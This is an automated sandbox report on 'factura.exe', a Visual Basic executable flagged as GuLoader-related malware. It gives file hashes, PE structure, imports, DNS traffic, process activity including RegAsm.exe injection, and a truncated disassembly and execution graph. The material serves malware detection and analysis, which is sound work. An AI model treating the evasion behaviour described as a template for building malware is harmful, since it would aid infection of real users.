      Run name:Run with higher sleep bypass
      Number of analysed new started processes analysed:18
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.rans.troj.evad.winEXE@4/0@0/0
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 95.3% (good quality ratio 66.7%)
      • Quality average: 41.5%
      • Quality standard deviation: 34.2%
      HCA Information:
      • Successful, ratio: 69%
      • Number of executed functions: 15
      • Number of non-executed functions: 28
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Sleeps bigger than 120000ms are automatically reduced to 1000ms
      • Found application associated with file extension: .exe
      Warnings:
      Show All
      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
      • Excluded IPs from analysis (whitelisted): 13.88.21.125, 40.88.32.150, 20.82.209.183, 23.10.249.26, 23.10.249.43, 104.42.151.234, 104.43.193.48, 52.155.217.156, 205.185.216.10, 205.185.216.42, 20.54.26.129, 20.82.210.154, 172.217.168.14
      • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, drive.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      No created / dropped files found

      Static File Info

      General

      File type:PE32 executable (GUI) Intel 80386, for MS Windows
      Entropy (8bit):5.437166061311082
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.15%
      • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:factura.exe
      File size:57344
      MD5:5950cbe94b3b5dedbf7b75fa1b95ac84
      SHA1:797bb1231483bb11279f6e63fbb5d675bda58f2a
      SHA256:73f2aa87dad06704e8bbd41fb7449a987dc089160a12ba5e13d7d7f6f4196a4f
      SHA512:6e1f38b5f3d257a2d7926213a4ec6947882b6f38bbac8f42e9d0b3a92762494eeec21920e9ef6cf8440e7298aa2fe1eb73c51ce1c8ec1bc4abae14b2d32b1811
      SSDEEP:768:1hk5+yYZnkRUpyncqBRccge9kk1nA36yY1SoqOiiy:1a5+yk/AnbBTbkmA33RoqOe
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....-l`.....................0....................@................

      File Icon

      Icon Hash:20047c7c70f0e004

      Static PE Info

      General

      Entrypoint:0x40169c
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      DLL Characteristics:
      Time Stamp:0x606C2D85 [Tue Apr 6 09:44:37 2021 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:b983fc96c0bd34be8388eeea33042759

      Entrypoint Preview

      Instruction
      push 0040192Ch
      call 00007F99E4BE87C5h
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      xor byte ptr [eax], al
      add byte ptr [eax], al
      inc eax
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [esi], bl
      mov word ptr [edi], cs
      mov eax, 4C003ABAh
      lahf
      js 00007F99E4BE8768h
      push es
      stosd
      or dh, byte ptr [ecx]
      add dword ptr [eax], 00000000h
      add byte ptr [ecx], al
      add byte ptr [eax], al
      add byte ptr [ecx+00h], al
      xchg byte ptr [eax-7Eh], dl
      add dword ptr [ebx+4Bh], edx
      inc ebp
      dec ebp
      inc ecx
      inc esi
      dec edi
      push edx
      dec ebp
      inc ebp
      push edx
      add byte ptr [ecx+ebp+00000312h], al
      add byte ptr [eax], al
      dec esp
      xor dword ptr [eax], eax
      add eax, 02836AD0h
      fmul qword ptr [ecx-66h]
      dec edi
      cdq
      mov seg?, word ptr [esi]
      call far B4BBh : 29F2388Ch
      mov al, E7h
      in al, 5Eh
      dec esp
      cdq
      xchg eax, ebx
      push ebx
      push eax
      fcmovu st(0), st(6)
      jp 00007F99E4BE8787h
      cmp cl, byte ptr [edi-53h]
      xor ebx, dword ptr [ecx-48EE309Ah]
      or al, 00h
      stosb
      add byte ptr [eax-2Dh], ah
      xchg eax, ebx
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add dword ptr [eax], eax
      add byte ptr [ebx+00h], cl
      add byte ptr [eax], al
      add byte ptr [ecx], cl
      add byte ptr [ecx+ebp*2+73h], al
      insd
      imul ebp, dword ptr [esi+69h], 0D006E6Fh
      add dword ptr [edx], ecx
      add byte ptr [eax+61h], dh
      imul esi, dword ptr [edx+70h], 00000069h

      Data Directories

      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0xada40x28.text
      IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000x9f0.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
      IMAGE_DIRECTORY_ENTRY_IAT0x10000x1ac.text
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

      Sections

      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x10000xa3b80xb000False0.535866477273data6.30476552767IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      .data0xc0000x11b40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
      .rsrc0xe0000x9f00x1000False0.181884765625data2.17356537605IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

      Resources

      NameRVASizeTypeLanguageCountry
      RT_ICON0xe8c00x130data
      RT_ICON0xe5d80x2e8data
      RT_ICON0xe4b00x128GLS_BINARY_LSB_FIRST
      RT_GROUP_ICON0xe4800x30data
      RT_VERSION0xe1500x330dataEnglishUnited States

      Imports

      DLLImport
      MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaHresultCheck, __vbaAryMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaObjVar, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaVarErrI4, __vbaI2Str, __vbaFPException, __vbaStrVarVal, __vbaDateVar, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaVar2Vec, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarAdd, __vbaLateMemCall, __vbaInStrB, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

      Version Infos

      DescriptionData
      Translation0x0409 0x04b0
      LegalCopyrightCollutions
      InternalNamekvalifikationen
      FileVersion1.00
      CompanyNameCollutions
      LegalTrademarksCollutions
      CommentsCollutions
      ProductNameCollutions
      ProductVersion1.00
      FileDescriptionCreepy Collutions
      OriginalFilenamekvalifikationen.exe

      Possible Origin

      Language of compilation systemCountry where language is spokenMap
      EnglishUnited States

      Network Behavior

      Network Port Distribution

      UDP Packets

      TimestampSource PortDest PortSource IPDest IP
      Apr 8, 2021 20:44:25.018028021 CEST5802853192.168.2.48.8.8.8
      Apr 8, 2021 20:44:25.033273935 CEST53580288.8.8.8192.168.2.4
      Apr 8, 2021 20:44:26.235450983 CEST5309753192.168.2.48.8.8.8
      Apr 8, 2021 20:44:26.249053001 CEST53530978.8.8.8192.168.2.4
      Apr 8, 2021 20:44:27.647319078 CEST4925753192.168.2.48.8.8.8
      Apr 8, 2021 20:44:27.659986973 CEST53492578.8.8.8192.168.2.4
      Apr 8, 2021 20:44:28.400440931 CEST6238953192.168.2.48.8.8.8
      Apr 8, 2021 20:44:28.413872957 CEST53623898.8.8.8192.168.2.4
      Apr 8, 2021 20:44:29.390337944 CEST4991053192.168.2.48.8.8.8
      Apr 8, 2021 20:44:29.403570890 CEST53499108.8.8.8192.168.2.4
      Apr 8, 2021 20:44:30.673795938 CEST5585453192.168.2.48.8.8.8
      Apr 8, 2021 20:44:30.687885046 CEST53558548.8.8.8192.168.2.4
      Apr 8, 2021 20:44:55.153501987 CEST6454953192.168.2.48.8.8.8
      Apr 8, 2021 20:44:55.170157909 CEST53645498.8.8.8192.168.2.4
      Apr 8, 2021 20:45:01.328985929 CEST6315353192.168.2.48.8.8.8
      Apr 8, 2021 20:45:01.348550081 CEST53631538.8.8.8192.168.2.4
      Apr 8, 2021 20:45:03.537647963 CEST5299153192.168.2.48.8.8.8
      Apr 8, 2021 20:45:03.550663948 CEST53529918.8.8.8192.168.2.4
      Apr 8, 2021 20:45:06.732263088 CEST5370053192.168.2.48.8.8.8
      Apr 8, 2021 20:45:06.745244026 CEST53537008.8.8.8192.168.2.4
      Apr 8, 2021 20:45:07.484611988 CEST5172653192.168.2.48.8.8.8
      Apr 8, 2021 20:45:07.500202894 CEST53517268.8.8.8192.168.2.4
      Apr 8, 2021 20:45:08.270230055 CEST5679453192.168.2.48.8.8.8
      Apr 8, 2021 20:45:08.283471107 CEST53567948.8.8.8192.168.2.4
      Apr 8, 2021 20:45:09.470990896 CEST5653453192.168.2.48.8.8.8
      Apr 8, 2021 20:45:09.483995914 CEST53565348.8.8.8192.168.2.4
      Apr 8, 2021 20:45:10.602649927 CEST5662753192.168.2.48.8.8.8
      Apr 8, 2021 20:45:10.615151882 CEST53566278.8.8.8192.168.2.4
      Apr 8, 2021 20:45:11.359272003 CEST5662153192.168.2.48.8.8.8
      Apr 8, 2021 20:45:11.371999025 CEST53566218.8.8.8192.168.2.4
      Apr 8, 2021 20:45:14.906299114 CEST6311653192.168.2.48.8.8.8
      Apr 8, 2021 20:45:14.919040918 CEST53631168.8.8.8192.168.2.4
      Apr 8, 2021 20:45:17.433084011 CEST6407853192.168.2.48.8.8.8
      Apr 8, 2021 20:45:17.545129061 CEST53640788.8.8.8192.168.2.4
      Apr 8, 2021 20:45:18.292279005 CEST6480153192.168.2.48.8.8.8
      Apr 8, 2021 20:45:18.384068012 CEST53648018.8.8.8192.168.2.4
      Apr 8, 2021 20:45:18.545285940 CEST6172153192.168.2.48.8.8.8
      Apr 8, 2021 20:45:18.560043097 CEST53617218.8.8.8192.168.2.4
      Apr 8, 2021 20:45:18.794848919 CEST5125553192.168.2.48.8.8.8
      Apr 8, 2021 20:45:18.807977915 CEST53512558.8.8.8192.168.2.4
      Apr 8, 2021 20:45:19.152693987 CEST6152253192.168.2.48.8.8.8
      Apr 8, 2021 20:45:19.168514967 CEST53615228.8.8.8192.168.2.4
      Apr 8, 2021 20:45:19.253931046 CEST5233753192.168.2.48.8.8.8
      Apr 8, 2021 20:45:19.266459942 CEST53523378.8.8.8192.168.2.4
      Apr 8, 2021 20:45:19.693877935 CEST5504653192.168.2.48.8.8.8
      Apr 8, 2021 20:45:19.706681013 CEST53550468.8.8.8192.168.2.4
      Apr 8, 2021 20:45:20.001358032 CEST4961253192.168.2.48.8.8.8
      Apr 8, 2021 20:45:20.014388084 CEST53496128.8.8.8192.168.2.4
      Apr 8, 2021 20:45:20.123475075 CEST4928553192.168.2.48.8.8.8
      Apr 8, 2021 20:45:20.139849901 CEST53492858.8.8.8192.168.2.4
      Apr 8, 2021 20:45:20.176346064 CEST5060153192.168.2.48.8.8.8
      Apr 8, 2021 20:45:20.190529108 CEST53506018.8.8.8192.168.2.4
      Apr 8, 2021 20:45:20.374970913 CEST6087553192.168.2.48.8.8.8
      Apr 8, 2021 20:45:20.407475948 CEST53608758.8.8.8192.168.2.4
      Apr 8, 2021 20:45:20.519582033 CEST5644853192.168.2.48.8.8.8
      Apr 8, 2021 20:45:20.611478090 CEST53564488.8.8.8192.168.2.4
      Apr 8, 2021 20:45:20.647066116 CEST5917253192.168.2.48.8.8.8
      Apr 8, 2021 20:45:20.661165953 CEST53591728.8.8.8192.168.2.4
      Apr 8, 2021 20:45:21.215986967 CEST6242053192.168.2.48.8.8.8
      Apr 8, 2021 20:45:21.229494095 CEST53624208.8.8.8192.168.2.4
      Apr 8, 2021 20:45:22.265459061 CEST6057953192.168.2.48.8.8.8
      Apr 8, 2021 20:45:22.280459881 CEST53605798.8.8.8192.168.2.4
      Apr 8, 2021 20:45:22.594882011 CEST5018353192.168.2.48.8.8.8
      Apr 8, 2021 20:45:22.648865938 CEST53501838.8.8.8192.168.2.4
      Apr 8, 2021 20:45:34.037904024 CEST6153153192.168.2.48.8.8.8
      Apr 8, 2021 20:45:34.058129072 CEST53615318.8.8.8192.168.2.4
      Apr 8, 2021 20:46:05.813369036 CEST4922853192.168.2.48.8.8.8
      Apr 8, 2021 20:46:05.828219891 CEST53492288.8.8.8192.168.2.4
      Apr 8, 2021 20:46:09.114721060 CEST5979453192.168.2.48.8.8.8
      Apr 8, 2021 20:46:09.143913984 CEST53597948.8.8.8192.168.2.4
      Apr 8, 2021 20:46:34.451797009 CEST5591653192.168.2.48.8.8.8
      Apr 8, 2021 20:46:34.480366945 CEST53559168.8.8.8192.168.2.4

      Code Manipulations

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      Behavior

      Click to jump to process

      System Behavior

      General

      Start time:20:44:30
      Start date:08/04/2021
      Path:C:\Users\user\Desktop\factura.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\user\Desktop\factura.exe'
      Imagebase:0x400000
      File size:57344 bytes
      MD5 hash:5950CBE94B3B5DEDBF7B75FA1B95AC84
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Visual Basic
      Reputation:low

      General

      Start time:20:46:23
      Start date:08/04/2021
      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
      Wow64 process (32bit):false
      Commandline:'C:\Users\user\Desktop\factura.exe'
      Imagebase:0x310000
      File size:53248 bytes
      MD5 hash:529695608EAFBED00ACA9E61EF333A7C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:20:46:24
      Start date:08/04/2021
      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\user\Desktop\factura.exe'
      Imagebase:0x800000
      File size:53248 bytes
      MD5 hash:529695608EAFBED00ACA9E61EF333A7C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Author: Joe Security
      Reputation:high

      General

      Start time:20:46:24
      Start date:08/04/2021
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff724c50000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Disassembly

      Code Analysis

      Reset < >

        Execution Graph

        Execution Coverage:6.2%
        Dynamic/Decrypted Code Coverage:1.7%
        Signature Coverage:1%
        Total number of Nodes:299
        Total number of Limit Nodes:16

        Graph

        execution_graph 1781 40a102 __vbaChkstk 1782 40a142 #554 1781->1782 1783 40a150 __vbaNew2 1782->1783 1784 40a168 1782->1784 1783->1784 1785 40a191 __vbaHresultCheckObj 1784->1785 1786 40a1a8 1784->1786 1785->1786 1787 40a1e9 1786->1787 1788 40a1cf __vbaHresultCheckObj 1786->1788 1789 40a1ed __vbaStrMove __vbaFreeObj 1787->1789 1788->1789 1790 40a230 __vbaFreeStr 1789->1790 1791 40ad02 1792 40acf1 __vbaFreeVar 1791->1792 1793 40ad11 #617 __vbaStrVarMove __vbaStrMove __vbaFreeVar 1791->1793 1794 40ad39 __vbaFreeStr 1792->1794 1793->1794 1702 409485 __vbaChkstk __vbaStrCopy 1703 4094c6 __vbaNew2 1702->1703 1704 4094de 1702->1704 1703->1704 1705 409507 __vbaHresultCheckObj 1704->1705 1706 40951e 1704->1706 1705->1706 1707 409542 __vbaHresultCheckObj 1706->1707 1708 409559 1706->1708 1709 40955d __vbaFreeObj 1707->1709 1708->1709 1710 409640 __vbaVarErrI4 #559 __vbaFreeVar 1709->1710 1711 409580 1709->1711 1712 409673 1710->1712 1713 4096e9 __vbaFreeStr 1710->1713 1718 4095b7 1711->1718 1719 40959d __vbaHresultCheckObj 1711->1719 1715 409694 1712->1715 1716 40967c __vbaNew2 1712->1716 1717 40969b __vbaObjSetAddref 1715->1717 1716->1717 1720 4096bb 1717->1720 1721 4095c4 __vbaNew2 1718->1721 1722 4095dc 1718->1722 1719->1718 1723 4096c6 __vbaHresultCheckObj 1720->1723 1724 4096dd 1720->1724 1725 4095e3 __vbaObjSet 1721->1725 1722->1725 1726 4096e1 __vbaFreeObj 1723->1726 1724->1726 1727 409612 1725->1727 1726->1713 1728 409634 1727->1728 1729 40961d __vbaHresultCheckObj 1727->1729 1730 409638 __vbaFreeObj 1728->1730 1729->1730 1730->1710 1655 401209 1656 401308 __vbaExceptHandler 1655->1656 1773 409f4d __vbaFreeStr __vbaFreeVarList 1731 40a68e __vbaChkstk __vbaStrCopy #712 __vbaStrMove __vbaStrCmp 1732 40a702 __vbaI2Str 1731->1732 1733 40a6f8 #569 1731->1733 1734 40a716 1732->1734 1735 40a7ae __vbaFreeObj __vbaFreeStr 1732->1735 1733->1732 1737 40a737 1734->1737 1738 40a71f __vbaNew2 1734->1738 1739 40a73e __vbaLateMemCallLd __vbaObjVar __vbaObjSetAddref 1737->1739 1738->1739 1740 40a778 1739->1740 1741 40a783 __vbaHresultCheckObj 1740->1741 1742 40a79a 1740->1742 1743 40a79e __vbaFreeObj __vbaFreeVar 1741->1743 1742->1743 1743->1735 1848 408d92 __vbaChkstk 1849 408dd2 1848->1849 1850 408df3 1849->1850 1851 408ddb __vbaNew2 1849->1851 1852 408e33 1850->1852 1853 408e1c __vbaHresultCheckObj 1850->1853 1851->1850 1854 408e74 1852->1854 1855 408e5a __vbaHresultCheckObj 1852->1855 1853->1852 1856 408e78 __vbaStrMove __vbaFreeObj __vbaInStrB 1854->1856 1855->1856 1857 408f00 __vbaFreeStr 1856->1857 1858 408ead 1856->1858 1858->1857 1859 408f56 1858->1859 1861 408ee6 __vbaHresultCheckObj 1858->1861 1859->1859 1861->1857 1796 40a513 __vbaChkstk 1797 40a553 1796->1797 1798 40a574 1797->1798 1799 40a55c __vbaNew2 1797->1799 1800 40a5b4 1798->1800 1801 40a59d __vbaHresultCheckObj 1798->1801 1799->1798 1802 40a5f5 1800->1802 1803 40a5db __vbaHresultCheckObj 1800->1803 1801->1800 1804 40a5f9 __vbaStrMove __vbaFreeObj __vbaInStr 1802->1804 1803->1804 1805 40a63e __vbaFreeStr 1804->1805 1806 40a62e __vbaFileOpen 1804->1806 1806->1805 1630 409e55 __vbaChkstk 1631 409e95 __vbaStrCopy #512 __vbaStrMove __vbaStrCmp __vbaFreeStr 1630->1631 1632 409eea #585 __vbaFpR8 1631->1632 1633 409edd #569 1631->1633 1634 409f06 __vbaVarDup #666 __vbaVarMove __vbaFreeVar 1632->1634 1635 409f3f __vbaFreeStr __vbaFreeVar 1632->1635 1633->1632 1634->1635 1672 40aad5 __vbaChkstk __vbaVarDup #557 __vbaFreeVar 1673 40ab93 __vbaVarDup #557 __vbaFreeVar 1672->1673 1674 40ab43 __vbaChkstk __vbaChkstk __vbaLateMemCall 1672->1674 1675 40abe1 __vbaFreeObj 1673->1675 1676 40abd4 #571 1673->1676 1674->1673 1676->1675 1808 408f15 __vbaFreeStr __vbaFreeObj 1658 40a416 __vbaChkstk 1659 40a456 __vbaI4Str 1658->1659 1660 40a465 #531 1659->1660 1661 40a46f #628 __vbaStrMove __vbaStrCmp __vbaFreeStr __vbaFreeVar 1659->1661 1660->1661 1662 40a4c6 __vbaEnd 1661->1662 1663 40a4cb 1661->1663 1662->1663 1678 40a4d8 __vbaFreeStr __vbaFreeVar 1814 4089d8 7 API calls 1815 408ae0 #673 __vbaFpR8 1814->1815 1816 408a87 __vbaChkstk __vbaChkstk __vbaLateMemCall 1814->1816 1817 408b27 __vbaFreeVar 1815->1817 1816->1815 1819 408b60 1817->1819 1820 408c52 __vbaAryDestruct __vbaFreeObj 1817->1820 1822 408b84 1819->1822 1823 408b69 __vbaNew2 1819->1823 1824 408b8e __vbaChkstk __vbaChkstk 1822->1824 1823->1824 1825 408bf8 1824->1825 1826 408c29 1825->1826 1827 408c09 __vbaHresultCheckObj 1825->1827 1828 408c30 __vbaVar2Vec __vbaAryMove __vbaFreeVar 1826->1828 1827->1828 1828->1820 1637 408c5a __vbaFreeVarList __vbaAryDestruct 1774 408f5b __vbaChkstk #671 __vbaFpR8 1775 408fe4 #583 __vbaFpR8 1774->1775 1776 408fba __vbaVarDup #529 __vbaFreeVar 1774->1776 1777 409000 __vbaVarDup #529 __vbaFreeVar 1775->1777 1778 40902a 1775->1778 1776->1775 1777->1778 1626 40169c #100 1627 401659 1626->1627 1628 4016c3 1626->1628 1627->1626 1664 40981c __vbaChkstk __vbaInStr 1665 409861 __vbaFileOpen 1664->1665 1666 409874 #648 __vbaFreeVar 1664->1666 1665->1666 1667 4098a7 1666->1667 1668 40921f __vbaFreeObjList __vbaFreeVarList 1809 40971f __vbaChkstk __vbaStrCopy #609 #557 __vbaFreeVar 1810 4097a1 __vbaVarDup #687 __vbaDateVar __vbaFreeVarList 1809->1810 1811 40978e __vbaFileOpen 1809->1811 1812 409800 __vbaFreeStr 1810->1812 1811->1810 1746 409aa1 __vbaFreeStr __vbaFreeObjList __vbaFreeVar 1779 408d61 __vbaFreeVar 1863 409fa2 __vbaChkstk 1864 409fe4 #583 __vbaFpR8 1863->1864 1865 40a000 __vbaVarDup #529 __vbaFreeVar 1864->1865 1866 40a02a #516 1864->1866 1865->1866 1867 40a03a __vbaVarDup #595 __vbaFreeVarList 1866->1867 1868 40a0ae 1866->1868 1867->1868 1638 40a266 __vbaChkstk 1639 40a2a8 #660 __vbaVarTstNe __vbaFreeVarList 1638->1639 1640 40a3a9 #648 __vbaFreeVar 1639->1640 1641 40a329 __vbaChkstk __vbaChkstk __vbaChkstk __vbaLateMemCall 1639->1641 1642 40a3ee __vbaFreeObj 1640->1642 1641->1640 1747 408cab __vbaChkstk 1748 408ceb #536 __vbaStrMove __vbaFreeVar #561 __vbaFreeVar 1747->1748 1749 408d5a __vbaFreeStr 1748->1749 1750 408d4a __vbaFileOpen 1748->1750 1750->1749 1830 4097ed __vbaFreeVarList 1643 409270 __vbaChkstk 1644 4092b2 __vbaVarTstNe 1643->1644 1645 409332 1644->1645 1646 4092e2 __vbaChkstk __vbaChkstk __vbaLateMemCall 1644->1646 1647 409356 1645->1647 1648 40933b __vbaNew2 1645->1648 1646->1645 1649 409385 __vbaHresultCheckObj 1647->1649 1650 40939f 1647->1650 1648->1647 1649->1650 1651 4093d8 __vbaHresultCheckObj 1650->1651 1652 4093fb 1650->1652 1653 409402 __vbaStrMove __vbaFreeObj 1651->1653 1652->1653 1654 40944b __vbaFreeObj __vbaFreeStr 1653->1654 1679 4096f0 __vbaFreeObjList 1831 409df1 __vbaFreeStr __vbaFreeObj __vbaFreeVarList 1671 409432 __vbaFreeStr __vbaFreeObj __vbaFreeVar 1540 407e34 __vbaChkstk 1541 407e81 #519 __vbaStrMove __vbaStrCmp __vbaFreeStr 1540->1541 1542 407ec6 1541->1542 1543 407fbe #591 __vbaStrMove __vbaStrCmp __vbaFreeStr __vbaFreeVar 1541->1543 1546 407eea 1542->1546 1547 407ecf __vbaNew2 1542->1547 1544 408021 __vbaStrCopy 1543->1544 1545 408014 #569 1543->1545 1549 408075 __vbaFreeStr __vbaStrCopy 1544->1549 1545->1544 1548 407ef4 __vbaChkstk __vbaChkstk 1546->1548 1547->1548 1550 407f64 1548->1550 1551 4080cc 1549->1551 1552 407f95 1550->1552 1553 407f75 __vbaHresultCheckObj 1550->1553 1555 4080fb 1551->1555 1556 4080db __vbaHresultCheckObj 1551->1556 1554 407f9c __vbaVar2Vec __vbaAryMove __vbaFreeVar 1552->1554 1553->1554 1554->1543 1557 408102 __vbaFreeStr __vbaStrCopy 1555->1557 1556->1557 1558 40815c 1557->1558 1559 40818b 1558->1559 1560 40816b __vbaHresultCheckObj 1558->1560 1561 408192 __vbaFreeStr __vbaStrCopy 1559->1561 1560->1561 1562 4081fb __vbaFreeStr __vbaStrCopy __vbaStrCopy 1561->1562 1604 40904f __vbaChkstk 1562->1604 1563 408243 1564 408272 1563->1564 1565 408252 __vbaHresultCheckObj 1563->1565 1566 408279 __vbaFreeStrList 1564->1566 1565->1566 1567 4082aa 1566->1567 1568 4082d9 __vbaStrCopy 1567->1568 1569 4082b9 __vbaHresultCheckObj 1567->1569 1571 408378 __vbaFreeStr __vbaStrCopy 1568->1571 1569->1568 1572 4083e0 1571->1572 1573 40840f 1572->1573 1574 4083ef __vbaHresultCheckObj 1572->1574 1575 408416 __vbaFreeStr 1573->1575 1574->1575 1576 40846c 1575->1576 1577 40849b 1576->1577 1578 40847b __vbaHresultCheckObj 1576->1578 1579 4084a2 __vbaStrCopy 1577->1579 1578->1579 1580 4084cd 1579->1580 1581 4084fc 1580->1581 1582 4084dc __vbaHresultCheckObj 1580->1582 1583 408503 __vbaFreeStr 1581->1583 1582->1583 1584 40852b 1583->1584 1585 40855a 1584->1585 1586 40853a __vbaHresultCheckObj 1584->1586 1587 408589 __vbaHresultCheckObj 1585->1587 1593 4085a9 1585->1593 1586->1585 1588 4085b0 __vbaVarAdd __vbaVarMove 1587->1588 1588->1593 1589 40866c __vbaHresultCheckObj 1589->1593 1590 4086c2 __vbaHresultCheckObj 1590->1593 1591 40875b __vbaHresultCheckObj 1591->1593 1592 4087b1 __vbaHresultCheckObj 1592->1593 1593->1588 1593->1589 1593->1590 1593->1591 1593->1592 1594 408845 __vbaHresultCheckObj 1593->1594 1595 40886c __vbaStrCopy 1593->1595 1594->1595 1621 